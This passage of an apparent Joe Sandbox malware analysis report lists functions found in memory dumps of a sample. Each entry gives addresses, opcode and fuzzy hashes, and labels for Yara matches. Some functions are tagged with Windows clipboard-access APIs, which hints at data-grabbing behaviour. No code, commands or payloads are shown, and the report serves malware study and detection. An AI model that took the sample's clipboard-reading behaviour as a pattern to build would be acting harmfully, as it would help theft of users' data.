                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
                                                                                                                                                                                                                                                                                      • Instruction ID: a5683805142de45443e201af72d8f80ed19f32af34444f2602e363540f5c00c5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C11E23A7583404FD718CF68D8E06BFB3E19B86301F99553E9482D3390CBB8D9068B46
                                                                                                                                                                                                                                                                                      Function 024D6C3B Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
                                                                                                                                                                                                                                                                                      • Instruction ID: 904447c18fdc186120996e3e179a3a2a9cf83880b231254f4875e0d2c2ee168f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D118E756042005BD3109F25EC90F3BB7EAEBE6B00F15983EE68097351DB30C8529B17
                                                                                                                                                                                                                                                                                      Function 0040E83B Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                                                      • Instruction ID: 78b4a12427cc173d586094b37f3e700b38d0ff2ce6b24877113fcbe6adf3e26f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D71127717507404FD3189F25CCD2A637772ABC6314705893DB8519BBD3C67CAC0587A8
                                                                                                                                                                                                                                                                                      Function 0040BDC9 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                                      • Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A
                                                                                                                                                                                                                                                                                      Function 024AEAA2 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                                                      • Instruction ID: 746540c4f75dbac2bb0ad4033115d9dbed4a791d372bf27cbc5208413e9dafb7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C211E3747407804FD7198F24CCE1E62B7A3ABE6318719853DA8529BB92C66CA805CB64
                                                                                                                                                                                                                                                                                      Function 024AC030 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                                      • Instruction ID: 7e4ef4dfd000250dccc41cf62ee75eefd32291fe65e0c6195db82d832905160c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD11A07160C341ABD7249F29DDA177FBBE2EBC2254F15AE2CE59653791C630C841CB0A
                                                                                                                                                                                                                                                                                      Function 024C70E4 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                                                      • Instruction ID: 07d927f51a982732aed2b8defaf10dc43f2742bc2c77ec6ad9f4cf305f2bb1a6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3F06DB5E0C3808BC718CF29C45062AFBE5AB9A700F10A93ED48AA3341DB31D545CB4A
                                                                                                                                                                                                                                                                                      Function 024C7797 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                                                                      • Instruction ID: 139943299d8f7674e00285cc760790d0b341eb988991ffd4f24b4ea509ca6324
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12F069B410D3919FC300DF29D29051BFFE0ABD5318F64EA6CE8DA5B212D334C5028B4A
                                                                                                                                                                                                                                                                                      Function 0042526A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                                                      • Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E
                                                                                                                                                                                                                                                                                      Function 024C54D1 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                                                      • Instruction ID: 4e1bf90af2862cd632a41f9c41a86fbb34201f378597aff713db246d6e560bd5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EF0EDB1A88302BAF6248E01CC53F6BB6B49B55B04F301519B344790E0E5E1B5498B0E
                                                                                                                                                                                                                                                                                      Function 0043AAB2 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                                      • Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609
                                                                                                                                                                                                                                                                                      Function 024DAD19 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                                      • Instruction ID: 87cc9f18dd191dfaea6de326804bc5a4d97192655c3ae647406c2bbc3b900ec3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AF0A735B456808BE704CF38E83195BBBE2E387228F145A7DD641D3751DB39C4018605
                                                                                                                                                                                                                                                                                      Function 024C63B6 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                                                      • Instruction ID: f7d119e43550a245d187c7776e2578210dd032933a342ab60f42eedc9d94b11f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACD0951C91C63AC30E690D1C011017DB7260A4350572BD1DFDCF1BF251CBF2C8074254
                                                                                                                                                                                                                                                                                      Function 024DC268 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                                      • Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19
                                                                                                                                                                                                                                                                                      Function 024DC79B Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                                      • Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C
                                                                                                                                                                                                                                                                                      Function 024C559D Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                                                      • Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E
                                                                                                                                                                                                                                                                                      Function 004310D0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                                      • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                                                      • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                                                      • Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                                                      • Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
                                                                                                                                                                                                                                                                                      Function 024D1337 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                                      • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                                                      • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                                                      • Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                                      • Instruction ID: 8fcf40d3e422f05f4db3d51c9116b7273c1c6e0656d7fff4e050fa629d7f3352
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67419F7050C7818ED301AF7C999835FBEE09F86318F084A7EE8D986392D6788548C793
                                                                                                                                                                                                                                                                                      Function 0042F83B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                      • String ID: L
                                                                                                                                                                                                                                                                                      • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                                                      • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                                      • Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
                                                                                                                                                                                                                                                                                      Function 024CFAA2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                      • String ID: L
                                                                                                                                                                                                                                                                                      • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                                                      • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                                      • Instruction ID: 944dd629f5db52d04beee8bb8bf28669a39320aa8a3c317659fe28a49b6c2579
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E41297110CBC18ED321DB3C845865EBFE1ABE6220F188A9DE5F5873E2D674854ACB53
                                                                                                                                                                                                                                                                                      Function 004322BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MetricsSystem
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                                      • Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                                                      • Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
